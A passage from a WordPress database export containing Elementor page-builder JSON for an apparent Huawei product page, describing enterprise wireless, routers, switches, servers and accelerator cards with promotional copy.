World.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02d3196\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"0b5fd48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3e67766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>FusionServer 2488H V5 Rack Server<\\/strong><\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>The FusionServer 2488H V5 is Huawei\\u2019s latest 2U 4-socket rack server. It is ideal for compute-intensive scenarios such as virtualization, High-Performance Computing (HPC), database, and SAP HANA.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ab05e53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"209e356\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>TaiShan 2280 ARM Server<\\/strong><\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>A 2U, 2-socket rack server powered by Huawei 64-bit ARMv8 Hi1616 processors that provides high performance with low power consumption.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"afa9864\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6f345fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><h3 class=\\\"sub-title\\\" style=\\\"text-align: center;\\\"><strong><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 1.0625rem;\\\">FusionServer G5500 Data Center Heterogeneous Server<\\/span><\\/strong><\\/h3><\\/div><\\/div><\\/div><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><p>FusionServer G5500 is a heterogeneous server positioned for data center deployment. It offers the best-in-class heterogeneous computing platform for scenarios such as Artificial Intelligence (AI), HPC, intelligent cloud, video analytics, and database acceleration.<\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e0516b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"76d1f39\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b1e6bb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Huawei FusionCube HCI<\\/strong><\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>Huawei FusionCube HCI (Hyper-Converged Infrastructure) is an IT platform based on a hyper-converged architecture. It complies with open architecture standards, converges compute and storage, and pre-integrates distributed storage engines, virtualization, and cloud management software, allowing for resource-on-demand provisioning and linear expansion.FusionCube HCI supports various hardware form factors including blade, high-density, and rack, meeting the flexible configuration requirements of different services for compute, storage, and I\\/O resources. The FusionCube HCI applies to cloud computing scenarios and is an ideal choice for deploying the IT infrastructure of cloud data centers.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b0e2b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14a0502\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>KunLun Mission Critical Server<\\/strong><\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>KunLun is designed for mission-critical workloads and is ideal for core databases, database application consolidation, in-memory computing, High-Performance Computing (HPC) fat nodes, and more scenarios. With innovative RAS 2.0 technology, the server offers an open x86 ecosystem with the reliability of UNIX servers, helping customers move from closed to open architecture and unlock innovation potential.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9774406\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e810c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div><div class=\\\"txtbox mask-gradient\\\"><h3 class=\\\"txtbox mask-gradient\\\" style=\\\"text-align: center;\\\"><strong><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 1.0625rem;\\\">FX-Series FPGA Accelerator Cards<\\/span><\\/strong><\\/h3><\\/div><\\/div><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\">These accelerator cards provide high-performance compute power and high-bandwidth data connections, making them ideal for hardware-accelerated services.<\\/div><\\/div><\\/div><\\/div><\\/div><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bf75fa8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6a97ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ff5b88b\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b042b9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6e6673f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"411a824\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why Huawei Servers?\",\"align\":\"center\",\"title_color\":\"#262626\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2106125\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7bc1fd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ef3e7b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"txtbox mask-gradient\\\"><h3 style=\\\"text-align: center;\\\"><strong>Efficient and Reliable<\\/strong><\\/h3><p>To ensure that we meet customer requirements for servers, Huawei implements stringent quality control across eight processes, including product planning, R&amp;D, supply chain management, and post-sales service. Before delivery, each product has undergone more than 2,000 hardware tests, 10,000 software tests, and 300 entry certifications.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b64a664\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5297401\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Continuous Innovation<\\/strong><\\/h3><p>Huawei\\u2019s Boundless Computing strategy accelerates innovation at the chip level across computing, storage, and networking technologies, moving enterprise intelligence toward a better-connected, smart world. Huawei has focused its years of R&amp;D development efforts by setting up global OpenLabs to collaborate with top partners.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3e872db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3841f1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Trustworthy<\\/strong><\\/h3><p>Huawei successfully cooperates with customers and technology partners, striving to provide open computing infrastructure that supports optimal customer and partner outcomes. With solid reliability, excellent performance, and easy integration, Huawei servers are used by more than 5,000 customers worldwide in more than 25 sectors.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5c750f60\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3bd8e1c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d5be247\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"sub-title\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"sub-title\\\"><div><div class=\\\"txtbox mask-gradient\\\" style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/div><\\/div><\\/div><\\/div><\\/div><\\/div><\\/div><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8467,1534,'_elementor_data','[{\"id\":\"af265c5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"dcd2f65\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c0afcf6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Enterprise Wireless<\\/h2><h4>Intelligent Wireless Connections, Building Digital Industries<\\/h4>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e4c641\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0a8b7c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":38.288,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"d213159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>What Are the Benefits of the Enterprise Wireless?<\\/strong><\\/h3><ul><li>Multiple Services on One Network<\\/li><li>Industrial-Grade Reliability<\\/li><li>Access Anytime and Anywhere<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1026f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":61.712},\"elements\":[{\"id\":\"d302fa2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: left;\\\">Huawei uses leading 4.5G wireless technologies and its in-depth understanding of industry customers to provide the eLTE Multimedia Critical Communications System (MCCS) Solution, the 4.5G-based eLTE narrowband and broadband integrated wireless IoT solution, and the GSM-R solution for a wide range of services, such as narrowband, broadband, voice, multimedia, fixed, and mobile. Huawei also builds a professional and reliable mobile communications platform for diverse industry applications, such as professional trunking voice, wireless video surveillance, broadband data access, mass data collection, railway wireless dispatching, and high-speed train control.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5306d2a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"252d9e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ddcfc15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"title\\\" style=\\\"text-align: center;\\\">Enterprise Routers<\\/h2><div class=\\\"sub-title\\\"><p style=\\\"text-align: center;\\\">Routers with large-capacity, high-reliability, easy O&amp;M, and low power consumption help enterprises in various industries to quickly achieve digital transformation.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fa15163\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"4dfdb57\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b1eec00\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">NE Series Routers<\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>Highest performance routers to power innovative enterprise applications from small to super huge scale. Carrier-grade reliability, flexible modular architecture, and energy-efficient technologies add up to great service at lowest TCO.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d09bf0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9dbfac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">ME60 Series<\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>2T hardware platform, providing 10G to 480G line cards (including 160G CGN line cards), supporting a maximum of 256K concurrent users and allowing 1,200 users to go online per second.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23f625e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6f14b9c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">PTN 7900 Series<\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>The OptiX PTN 7900 NE is a new-generation high-capacity, high-bandwidth, and software-defined core device that supports smart services.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4fdaf04\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"c1e2534\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f28936f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">AR502 Series IoT Gateways<\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>The AR502 uses the built-in industrial-grade LTE module, and offers high bandwidth and low-latency wireless access. It provides various local interfaces and applies to a number of IoT fields, such as smart grid, smart city, and smart building.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eda219b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1df5ae0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">AR1200 Series Enterprise Routers<\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>The AR1200 is a multi-service router designed for Small and Medium-sized Enterprises (SMEs). It provides Internet access, dedicated line access, and voice, security, and wireless functions. It can be deployed at the egress of small and medium-sized campus networks and the headquarters and branches of SMEs.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"91bd5a6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"64c641b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4e5f077\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6f707b6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"09dccae\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e45fa25\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why Huawei Routers?\",\"align\":\"center\",\"title_color\":\"#262626\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f09523f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"50a7aa9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d4a10ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Leading Market Share<\\/strong><\\/h3><p>Huawei routers ranked No. 1 in China and No. 2 in the global market, and 70% of carriers and enterprise network NAs use them.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fa6a80b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d96c0e8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Strong Development Capabilities<\\/strong><\\/h3><p>Huawei is a leader and outstanding contributor in the IP standards field. Its proprietary Solar chipset had large-scale commercial use on the live network in 2013 and more than 3 million chips were delivered, and the Huawei-proprietary VRP software is the culmination of 17 years of innovation.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4a8f8dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c899bf8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Award Winning Products<\\/strong><\\/h3><p>Huawei routers have won multiple international awards, including SDN-VDC InfoVision award and Japan\\u2019s Interop gold award, and they have obtained certification from multiple third-party authoritative organizations worldwide.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e9e84d8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5c29eb1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21fd9b2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f758119\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"e9f40c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"12c9961\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"title\\\" style=\\\"text-align: center;\\\">Switches<\\/h2><div class=\\\"sub-title\\\" style=\\\"text-align: center;\\\">For a wide variety of applications and network\\u00a0sizes, from\\u00a0cloud data centers to campus networks<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dc61304\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"b1ab896\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"79e3e82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Campus Switches<\\/strong><\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>Huawei\\u2019s self-developed, innovative data center, campus, and carrier switch portfolios help accelerate your digital transformation.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17073bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"090de2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Data Center Switches<\\/strong><\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>CloudEngine series switches offer carrier-grade reliability, virtualization support, iStack clustering, and Software-Defined Networking features for building and scaling data centers and campus networks. They provide versatility and resilient performance for server-based multimedia applications, Big Data analytics, and cloud computing.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f42fd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78ffde0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7e04b2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"59745dc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f5e0203\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c70ae6d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why Huawei Switches?\",\"align\":\"center\",\"title_color\":\"#262626\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a0d3196\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7ae93ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6c25356\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"txtbox mask-gradient\\\"><h3 class=\\\"sub-title\\\" style=\\\"text-align: center;\\\"><strong><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 1.0625rem;\\\">Diversified Products and Solutions<\\/span><\\/strong><\\/h3><\\/div><div><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><p>Huawei provides the most complete portfolio of data center network and campus products, supporting customers business requirements for digital transformation and enabling their rapid growth of virtualization, Big Data, and cloud services.<\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e2cc85e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4446ef9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Extensive Customer Cases<\\/strong><\\/h3><p>Huawei switches have been deployed for enterprises in more than 150 countries and are widely used in sectors such as finance, Internet, retail, education, manufacturing, and public services. Huawei\\u2019s data center network and wired and wireless convergence solutions are rated as Challenger and Visionary in Gartner\\u2019s Magic Quadrant, respectively.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4b8bf3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"de9899a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 class=\\\"txtbox mask-gradient\\\" style=\\\"text-align: center;\\\"><strong><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 1.0625rem;\\\">Many Global Channels and Localized Services<\\/span><\\/strong><\\/h3><div><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><p>Huawei switches support tens of thousands of channels and partners in 150 countries, providing innovative switch solutions in all industries and localized services.<\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"28d9a79\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d985467\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9410c6c\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93b9ac\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"7454910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb5f64a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"title\\\" style=\\\"text-align: center;\\\">Servers - Intelligent Computing<\\/h2><div class=\\\"sub-title\\\"><p style=\\\"text-align: center;\\\">Boundless Computing Inspires an Intelligent Digital World.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02d3196\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"0b5fd48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3e67766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>FusionServer 2488H V5 Rack Server<\\/strong><\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>The FusionServer 2488H V5 is Huawei\\u2019s latest 2U 4-socket rack server. It is ideal for compute-intensive scenarios such as virtualization, High-Performance Computing (HPC), database, and SAP HANA.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ab05e53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"209e356\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>TaiShan 2280 ARM Server<\\/strong><\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>A 2U, 2-socket rack server powered by Huawei 64-bit ARMv8 Hi1616 processors that provides high performance with low power consumption.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"afa9864\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6f345fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><h3 class=\\\"sub-title\\\" style=\\\"text-align: center;\\\"><strong><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 1.0625rem;\\\">FusionServer G5500 Data Center Heterogeneous Server<\\/span><\\/strong><\\/h3><\\/div><\\/div><\\/div><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><p>FusionServer G5500 is a heterogeneous server positioned for data center deployment. It offers the best-in-class heterogeneous computing platform for scenarios such as Artificial Intelligence (AI), HPC, intelligent cloud, video analytics, and database acceleration.<\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e0516b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"76d1f39\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b1e6bb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Huawei FusionCube HCI<\\/strong><\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>Huawei FusionCube HCI (Hyper-Converged Infrastructure) is an IT platform based on a hyper-converged architecture. It complies with open architecture standards, converges compute and storage, and pre-integrates distributed storage engines, virtualization, and cloud management software, allowing for resource-on-demand provisioning and linear expansion.FusionCube HCI supports various hardware form factors including blade, high-density, and rack, meeting the flexible configuration requirements of different services for compute, storage, and I\\/O resources. The FusionCube HCI applies to cloud computing scenarios and is an ideal choice for deploying the IT infrastructure of cloud data centers.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b0e2b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14a0502\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>KunLun Mission Critical Server<\\/strong><\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>KunLun is designed for mission-critical workloads and is ideal for core databases, database application consolidation, in-memory computing, High-Performance Computing (HPC) fat nodes, and more scenarios. With innovative RAS 2.0 technology, the server offers an open x86 ecosystem with the reliability of UNIX servers, helping customers move from closed to open architecture and unlock innovation potential.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9774406\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e810c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div><div class=\\\"txtbox mask-gradient\\\"><h3 class=\\\"txtbox mask-gradient\\\" style=\\\"text-align: center;\\\"><strong><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 1.0625rem;\\\">FX-Series FPGA Accelerator Cards<\\/span><\\/strong><\\/h3><\\/div><\\/div><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\">These accelerator cards provide high-performance compute power and high-bandwidth data connections, making them ideal for hardware-accelerated 